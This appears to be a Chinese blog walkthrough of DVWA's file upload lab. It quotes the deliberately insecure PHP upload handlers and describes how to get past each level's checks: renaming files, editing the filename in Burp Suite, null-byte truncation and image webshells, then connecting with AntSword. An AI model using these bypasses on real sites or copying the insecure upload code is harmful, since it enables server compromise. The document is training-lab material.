Low:

<?php

if( isset( $_POST[ 'Upload' ] ) ) {

// Where are we going to be writing to?

$target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";

$target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

// Can we move the file to the upload folder?

if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {

// No

echo '<pre>Your image was not uploaded.</pre>';

}

else {

// Yes!

echo "<pre>{$target_path} succesfully uploaded!</pre>";

}

}

?>

上传漏洞是有限制的，第一能上传上去，第二上传上去的文件可以被执行，第三上传路径已知

低级别就直接传一句话木马

暴露出路径，蚁剑连就好

Medium：

<?php

if( isset( $_POST[ 'Upload' ] ) ) {

// Where are we going to be writing to?

$target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";

$target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

// File information

$uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];

$uploaded_type = $_FILES[ 'uploaded' ][ 'type' ];

$uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];

// Is it an image?

if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) &&

( $uploaded_size < 100000 ) ) {

// Can we move the file to the upload folder?

if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {

// No

echo '<pre>Your image was not uploaded.</pre>';

}

else {

// Yes!

echo "<pre>{$target_path} succesfully uploaded!</pre>";

}

}

else {

// Invalid file

echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';

}

}

?>

嗯，对上传文件的类型大小有限制，文件类型必须是jpeg或者png，大小不能超过100000B

把lcx.php改成lcx.png，上传用burp suite抓包，把filename改成lcx.php即可，再用蚁剑连

如果PHP版本低的话Magic_quote_gpc=off，可以试试 00截断

当然一般不会有

High:

<?php

if( isset( $_POST[ 'Upload' ] ) ) {

// Where are we going to be writing to?

$target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";

$target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

// File information

$uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];

$uploaded_ext  = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1);

$uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];

$uploaded_tmp  = $_FILES[ 'uploaded' ][ 'tmp_name' ];

// Is it an image?

if( ( strtolower( $uploaded_ext ) == "jpg" || strtolower( $uploaded_ext ) == "jpeg" || strtolower( $uploaded_ext ) == "png" ) &&

( $uploaded_size < 100000 ) &&

getimagesize( $uploaded_tmp ) ) {

// Can we move the file to the upload folder?

if( !move_uploaded_file( $uploaded_tmp, $target_path ) ) {

// No

echo '<pre>Your image was not uploaded.</pre>';

}

else {

// Yes!

echo "<pre>{$target_path} succesfully uploaded!</pre>";

}

}

else {

// Invalid file

echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';

}

}

?>

熟悉的strrpos(string,find,start)函数，找find在string中最后一次出现的位置，start为开始搜索位置

getimagesize函数用于获取图像大小及相关信息，成功返回一个数组，失败则返回 FALSE

大致是判断了文件类型是否为.jpg      .jpeg       .png之一，且类型必须是图片

老办法，copy做一图片马

做完上传，蚁剑连接拿shell

Impossible：

此级别下首先就把上传文件重命名了，还有上传后也不显示路径了

最新文章

1. 盘点销售一体机 打印POS一体的设备。 打印，盘点，销售PDA（手持终端）+移动销售POS软件
2. vs 调试的时候 使用IP地址，局域网的设备可以访问并调试
3. Python函数参数学习笔记
4. POJ1985Cow Marathon[树的直径]
5. 【ELK Stack】ELK+KafKa开发集群环境搭建
6. HDU 4927
7. html图像入门
8. V9 二次开发技术篇之 模型数据库
9. 【java提高】---ArrayList源码
10. Technical debt
11. Python开发爬虫之静态网页抓取篇：爬取“豆瓣电影 Top 250”电影数据
12. Python自学:第三章 使用方法sort( )对列表进行永久性排序
13. npm、webpack、vue-cli 快速上手版
14. 安装redis出现cc adlist.o /bin/sh:1:cc:not found的解决方法
15. Robot Framework 教程 (5) - 连接Oracel数据库
16. 亚马逊MWS开发套路演示
17. go基础语法-内置变量类型
18. ray tracing/shadow,reflection, caustic
19. 【spark】示例：求Top值
20. （二）centos7安装zabbix agentd端

热门文章

1. Spring：Spring嵌套事务方式
2. ClouderaManager安装时mysql信息问题
3. python opencv处理图片
4. Hibernate框架（二）POJO对象的操作
5. MindInsight:一款基于MindSpore框架的训练可视化插件
6. 2021/2/5 关于new的一个教训
7. C语言：读写TXT
8. Gos Log每次查询响应后自动清理临时文件，优化磁盘空间
9. 第二十四篇 -- Cache学习
10. vue el-table 调整 行间距